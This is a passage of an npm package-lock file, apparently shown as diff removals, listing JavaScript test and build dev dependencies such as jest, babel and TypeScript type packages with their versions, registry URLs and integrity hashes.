"sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - }, - "dependencies": { - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - } - } - }, - "@nicolo-ribaudo/semver-v6": { - "version": "6.3.3", - "resolved": "https://registry.npmjs.org/@nicolo-ribaudo/semver-v6/-/semver-v6-6.3.3.tgz", - "integrity": "sha512-3Yc1fUTs69MG/uZbJlLSI3JISMn2UV2rg+1D/vROUqZyh3l6iYHCs7GMp+M40ZD7yOdDbYjJcU1oTJhrc+dGKg==", - "dev": true - }, - "@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "requires": { - "@sinonjs/commons": "^3.0.0" - } - }, - "@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", - "dev": true, - "requires": { - "@babel/types": "^7.20.7" - } - }, - "@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/node": { - "version": "20.4.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.4.1.tgz", - "integrity": "sha512-JIzsAvJeA/5iY6Y/OxZbv1lUcc8dNSE77lb2gnBH+/PJ3lFR1Ccvgwl5JWnHAkNHcRsT0TbpVOsiMKZ1F/yyJg==", - "dev": true - }, - "@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "requires": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - } - }, - "babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - } - }, - "babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "requires": { - "fill-range": "^7.1.1" - } - }, - "browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001515", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001515.tgz", - "integrity": "sha512-eEFDwUOZbE24sb+Ecsx3+OvNETqjWIdabMy52oOkIgcUtAsQifjUG9q4U9dgTHJM2mfk4uEPxc0+xuFdJ629QA==", - "dev": true - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true - }, - "electron-to-chromium": { - "version": "1.4.455", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.455.tgz", - "integrity": "sha512-8tgdX0Odl24LtmLwxotpJCVjIndN559AvaOtd67u+2mo+IDsgsTF580NB+uuDCqsHw8yFg53l5+imFV9Fw3cbA==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true - }, - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": 